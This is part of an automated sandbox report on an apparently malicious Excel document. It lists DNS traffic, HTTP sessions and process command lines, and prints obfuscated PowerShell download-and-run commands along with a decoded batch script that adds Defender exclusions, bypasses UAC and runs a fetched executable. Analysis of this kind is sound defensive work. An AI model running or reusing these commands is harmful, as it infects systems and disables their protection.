                                                        Jan 8, 2021 09:06:24.946413994 CET192.168.2.228.8.8.80x3f32Standard query (0)telete.inA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:51.222317934 CET192.168.2.228.8.8.80xc52eStandard query (0)telete.inA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:51.323060036 CET192.168.2.228.8.8.80x8c7bStandard query (0)telete.inA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:07:17.531116009 CET192.168.2.228.8.8.80x5a45Standard query (0)telete.inA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:07:17.611469030 CET192.168.2.228.8.8.80xeacfStandard query (0)telete.inA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:07:43.751187086 CET192.168.2.228.8.8.80xaf2aStandard query (0)telete.inA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:07:43.828711987 CET192.168.2.228.8.8.80xa4a6Standard query (0)telete.inA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:09.986008883 CET192.168.2.228.8.8.80x78c7Standard query (0)telete.inA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:10.055391073 CET192.168.2.228.8.8.80x9788Standard query (0)telete.inA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:11.778194904 CET192.168.2.228.8.8.80xc5eStandard query (0)trashbininspector.funA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:11.870695114 CET192.168.2.228.8.8.80x1e1fStandard query (0)trashbininspector.funA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:26.348934889 CET192.168.2.228.8.8.80xff23Standard query (0)trashbininspector.funA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:26.413012981 CET192.168.2.228.8.8.80x8f4fStandard query (0)trashbininspector.funA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        Jan 8, 2021 09:06:06.952363014 CET8.8.8.8192.168.2.220xd78fNo error (0)cutt.ly104.22.1.232A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:06.952363014 CET8.8.8.8192.168.2.220xd78fNo error (0)cutt.ly172.67.8.238A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:06.952363014 CET8.8.8.8192.168.2.220xd78fNo error (0)cutt.ly104.22.0.232A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:18.668276072 CET8.8.8.8192.168.2.220x1192No error (0)cutt.ly104.22.1.232A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:18.668276072 CET8.8.8.8192.168.2.220x1192No error (0)cutt.ly172.67.8.238A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:18.668276072 CET8.8.8.8192.168.2.220x1192No error (0)cutt.ly104.22.0.232A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:19.493421078 CET8.8.8.8192.168.2.220x4317No error (0)chebo.discountmonumentcenter.com192.185.194.191A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:24.923634052 CET8.8.8.8192.168.2.220xefb6No error (0)telete.in195.201.225.248A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:25.002636909 CET8.8.8.8192.168.2.220x3f32No error (0)telete.in195.201.225.248A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:51.282998085 CET8.8.8.8192.168.2.220xc52eNo error (0)telete.in195.201.225.248A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:51.382138014 CET8.8.8.8192.168.2.220x8c7bNo error (0)telete.in195.201.225.248A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:07:17.591433048 CET8.8.8.8192.168.2.220x5a45No error (0)telete.in195.201.225.248A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:07:17.659508944 CET8.8.8.8192.168.2.220xeacfNo error (0)telete.in195.201.225.248A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:07:43.810369015 CET8.8.8.8192.168.2.220xaf2aNo error (0)telete.in195.201.225.248A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:07:43.890265942 CET8.8.8.8192.168.2.220xa4a6No error (0)telete.in195.201.225.248A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:10.042922974 CET8.8.8.8192.168.2.220x78c7No error (0)telete.in195.201.225.248A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:10.112701893 CET8.8.8.8192.168.2.220x9788No error (0)telete.in195.201.225.248A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:11.847470999 CET8.8.8.8192.168.2.220xc5eNo error (0)trashbininspector.fun104.18.58.219A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:11.847470999 CET8.8.8.8192.168.2.220xc5eNo error (0)trashbininspector.fun172.67.166.210A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:11.847470999 CET8.8.8.8192.168.2.220xc5eNo error (0)trashbininspector.fun104.18.59.219A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:11.934531927 CET8.8.8.8192.168.2.220x1e1fNo error (0)trashbininspector.fun104.18.58.219A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:11.934531927 CET8.8.8.8192.168.2.220x1e1fNo error (0)trashbininspector.fun172.67.166.210A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:11.934531927 CET8.8.8.8192.168.2.220x1e1fNo error (0)trashbininspector.fun104.18.59.219A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:26.409410000 CET8.8.8.8192.168.2.220xff23No error (0)trashbininspector.fun104.18.58.219A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:26.409410000 CET8.8.8.8192.168.2.220xff23No error (0)trashbininspector.fun172.67.166.210A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:26.409410000 CET8.8.8.8192.168.2.220xff23No error (0)trashbininspector.fun104.18.59.219A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:26.469329119 CET8.8.8.8192.168.2.220x8f4fNo error (0)trashbininspector.fun104.18.58.219A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:26.469329119 CET8.8.8.8192.168.2.220x8f4fNo error (0)trashbininspector.fun172.67.166.210A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:26.469329119 CET8.8.8.8192.168.2.220x8f4fNo error (0)trashbininspector.fun104.18.59.219A (IP address)IN (0x0001)

                                                        HTTP Request Dependency Graph

                                                        • 37.46.150.139
                                                        • chebo.discountmonumentcenter.com

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.224916737.46.150.13980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jan 8, 2021 09:06:11.405921936 CET72OUTGET /bat/scriptxls_bcb01d52-349f-4210-b1fc-2540a097ee09_fteenetx_wdexclusion.bat HTTP/1.1
                                                        Host: 37.46.150.139
                                                        Connection: Keep-Alive
                                                        Jan 8, 2021 09:06:11.458991051 CET73INHTTP/1.1 200 OK
                                                        Date: Fri, 08 Jan 2021 08:06:11 GMT
                                                        Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.4.12
                                                        Last-Modified: Mon, 04 Jan 2021 21:26:11 GMT
                                                        ETag: "7d0-5b819bd338a68"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 2000
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-msdownload
                                                        Data Raw: 6d 6f 64 65 20 31 38 2c 31 0d 0a 63 6f 6c 6f 72 20 46 45 0d 0a 73 65 74 6c 6f 63 61 6c 0d 0a 66 6f 72 20 2f 66 20 22 74 6f 6b 65 6e 73 3d 34 2d 35 20 64 65 6c 69 6d 73 3d 2e 20 22 20 25 25 69 20 69 6e 20 28 27 76 65 72 27 29 20 64 6f 20 73 65 74 20 56 45 52 53 49 4f 4e 3d 25 25 69 2e 25 25 6a 0d 0a 69 66 20 22 25 76 65 72 73 69 6f 6e 25 22 20 3d 3d 20 22 31 30 2e 30 22 20 28 20 65 63 68 6f 20 22 57 69 6e 64 6f 77 73 20 31 30 20 64 65 74 65 63 74 65 64 22 20 0d 0a 72 65 67 20 61 64 64 20 22 48 4b 43 55 5c 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 2f 76 20 22 77 69 6e 64 69 72 22 20 2f 64 20 22 63 6d 64 20 2f 63 20 73 74 61 72 74 20 70 5e 6f 77 65 72 73 68 5e 65 6c 5e 6c 20 2d 77 20 31 20 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 24 65 6e 76 3a 74 65 6d 70 22 20 3b 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 24 65 6e 76 3a 61 70 70 64 61 74 61 22 20 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 31 32 3b 20 28 4e 65 77 2d 4f 62 6a 65 63 74 20 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 29 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 27 68 74 74 70 73 3a 2f 2f 63 75 74 74 2e 6c 79 2f 30 6a 73 62 55 44 54 27 2c 28 24 65 6e 76 3a 61 70 70 64 61 74 61 29 2b 27 5c 63 72 2e 65 78 65 27 29 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 32 3b 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 24 65 6e 76 3a 61 70 70 64 61 74 61 5c 63 72 2e 65 78 65 3b 26 52 45 4d 20 22 20 3e 6e 75 6c 0d 0a 74 69 6d 65 6f 75 74 20 2f 74 20 32 20 3e 6e 75 6c 0d 0a 73 63 68 74 61 73 6b 73 20 2f 72 75 6e 20 2f 74 6e 20 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 44 69 73 6b 43 6c 65 61 6e 75 70 5c 53 69 6c 65 6e 74 43 6c 65 61 6e 75 70 20 2f 49 20 3e 6e 75 6c 0d 0a 74 69 6d 65 6f 75 74 20 2f 74 20 33 20 3e 6e 75 6c 0d 0a 72 65 67 20 64 65 6c 65 74 65 20 22 48 4b 43 55 5c 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 2f 76 20 22 77 69 6e 64 69 72 22 20 2f 46 0d 0a 29 0d 0a 69 66 20 22 25 76 65 72 73 69 6f 6e 25 22 20 3d 3d 20 22 36 2e 33 22 20 28 20 65 63 68 6f 20 22 57 69 6e 64 6f 77 73 20 38 2e 31 20 64 65 74 65 63 74 65 64 22 20 0d 0a 72 65 67 20 61 64 64 20 22 48 4b 43 55 5c 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 2f 76 20 22 77 69 6e 64 69 72 22 20 2f 64 20 22 63 6d 64 20 2f 63 20 73 74 61 72 74 20 70 5e 6f 77 65 72 73 68 5e 65 6c 5e 6c 20 2d 77 20 31 20 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 24 65 6e 76 3a 74 65 6d 70 22 20 3b 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 24 65 6e 76 3a 61 70 70 64 61 74 61 22 20 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 31 32 3b 20 28 4e 65 77 2d 4f 62 6a 65 63 74 20 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 29 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 27 68 74 74 70 73 3a 2f 2f 63 75 74 74 2e 6c 79 2f 30 6a 73 62 55 44 54 27 2c 28 24 65 6e 76 3a 61 70 70 64 61 74 61 29 2b 27 5c 63 72 2e 65 78 65 27 29 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 32 3b 20 53 74 61 72 74 2d 50 72 6f 63 65 73
                                                        Data Ascii: mode 18,1color FEsetlocalfor /f "tokens=4-5 delims=. " %%i in ('ver') do set VERSION=%%i.%%jif "%version%" == "10.0" ( echo "Windows 10 detected" reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 Add-MpPreference -ExclusionPath "$env:temp" ;Add-MpPreference -ExclusionPath "$env:appdata" ;Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;&REM " >nultimeout /t 2 >nulschtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nultimeout /t 3 >nulreg delete "HKCU\Environment" /v "windir" /F)if "%version%" == "6.3" ( echo "Windows 8.1 detected" reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 Add-MpPreference -ExclusionPath "$env:temp" ;Add-MpPreference -ExclusionPath "$env:appdata" ;Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Proces


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.2.2249169192.185.194.19180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jan 8, 2021 09:06:19.652738094 CET81OUTGET /vantuz_2021.exe HTTP/1.1
                                                        Host: chebo.discountmonumentcenter.com
                                                        Connection: Keep-Alive
                                                        Jan 8, 2021 09:06:19.814476967 CET82INHTTP/1.1 200 OK
                                                        Date: Fri, 08 Jan 2021 08:06:19 GMT
                                                        Server: Apache
                                                        Upgrade: h2,h2c
                                                        Connection: Upgrade, Keep-Alive
                                                        Last-Modified: Mon, 04 Jan 2021 21:24:49 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 565248
                                                        Keep-Alive: timeout=5, max=75
                                                        Content-Type: application/x-msdownload
                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b2 d5 65 2a f6 b4 0b 79 f6 b4 0b 79 f6 b4 0b 79 e8 e6 8f 79 ed b4 0b 79 e8 e6 9e 79 ee b4 0b 79 e8 e6 88 79 97 b4 0b 79 d1 72 70 79 fd b4 0b 79 f6 b4 0a 79 93 b4 0b 79 e8 e6 81 79 f7 b4 0b 79 e8 e6 9f 79 f7 b4 0b 79 e8 e6 9a 79 f7 b4 0b 79 52 69 63 68 f6 b4 0b 79 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 17 b8 18 5e 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 30 08 00 00 80 00 00 00 c0 37 04 b0 36 3f 04 00 d0 37 04 00 00 40 04 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 40 04 00 10 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 71 40 04 60 01 00 00 00 00 40 04 04 71 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 38 3f 04 18 00 00 00 88 f6 3f 04 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 c0 37 04 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 30 08 00 00 d0 37 04 00 28 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 80 00 00 00 00 40 04 00 74 00 00 00 2c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 2e 39 35 00 55 50 58 21 0d 09 08 02 b9 07 27 2e f1 8f 7a 31 fc 18 3f 04 af 66 07 00 00 f2 16 00 24 69 00 8b f3 bc b6 f2 80 d9 06 00 94 d7 0e a8 06 bc d6 9e d7 3e cf ec fe 14 d8 2e 28 06 44 5e ef
                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$e*yyyyyyyyyrpyyyyyyyyyyRichyPEL^076?7@@@q@`@qT8??HUPX07UPX107(@.rsrc@t,@3.95UPX!'.z1?f$i>.(D^


                                                        HTTPS Packets

                                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                        Jan 8, 2021 09:06:07.078320026 CET104.22.1.232443192.168.2.2249165CN=www.cutt.ly CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USSat Feb 08 01:00:00 CET 2020 Thu Nov 02 13:24:33 CET 2017Thu Apr 08 14:00:00 CEST 2021 Tue Nov 02 13:24:33 CET 2027769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                        CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Nov 02 13:24:33 CET 2017Tue Nov 02 13:24:33 CET 2027
                                                        Jan 8, 2021 09:06:18.773220062 CET104.22.1.232443192.168.2.2249168CN=www.cutt.ly CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USSat Feb 08 01:00:00 CET 2020 Thu Nov 02 13:24:33 CET 2017Thu Apr 08 14:00:00 CEST 2021 Tue Nov 02 13:24:33 CET 2027769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                        CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Nov 02 13:24:33 CET 2017Tue Nov 02 13:24:33 CET 2027
                                                        Jan 8, 2021 09:08:10.254141092 CET195.201.225.248443192.168.2.2249174CN=telecut.in CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sat Dec 19 08:52:17 CET 2020 Wed Oct 07 21:21:40 CEST 2020Fri Mar 19 08:52:17 CET 2021 Wed Sep 29 21:21:40 CEST 2021769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                        CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                        Jan 8, 2021 09:08:12.033230066 CET104.18.58.219443192.168.2.2249176CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEWed Dec 23 01:00:00 CET 2020 Mon Jan 27 13:48:08 CET 2020Thu Dec 23 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2025769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                        Jan 8, 2021 09:08:26.568110943 CET104.18.58.219443192.168.2.2249177CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEWed Dec 23 01:00:00 CET 2020 Mon Jan 27 13:48:08 CET 2020Thu Dec 23 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2025769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                        Code Manipulations

                                                        Statistics

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Start time:09:05:53
                                                        Start date:08/01/2021
                                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                        Imagebase:0x13f480000
                                                        File size:27641504 bytes
                                                        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:09:05:56
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:05:56
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:05:57
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:05:57
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
                                                        Imagebase:0x13f870000
                                                        File size:473600 bytes
                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        General

                                                        Start time:09:05:57
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:05:57
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
                                                        Imagebase:0x13f870000
                                                        File size:473600 bytes
                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        General

                                                        Start time:09:05:57
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:05:58
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
                                                        Imagebase:0x13f870000
                                                        File size:473600 bytes
                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        General

                                                        Start time:09:05:59
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
                                                        Imagebase:0x13f870000
                                                        File size:473600 bytes
                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        General

                                                        Start time:09:05:59
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
                                                        Imagebase:0x13f870000
                                                        File size:473600 bytes
                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000011.00000002.2156606049.000000000370B000.00000004.00000001.sdmp, Author: Florian Roth
                                                        Reputation:high

                                                        General

                                                        Start time:09:06:04
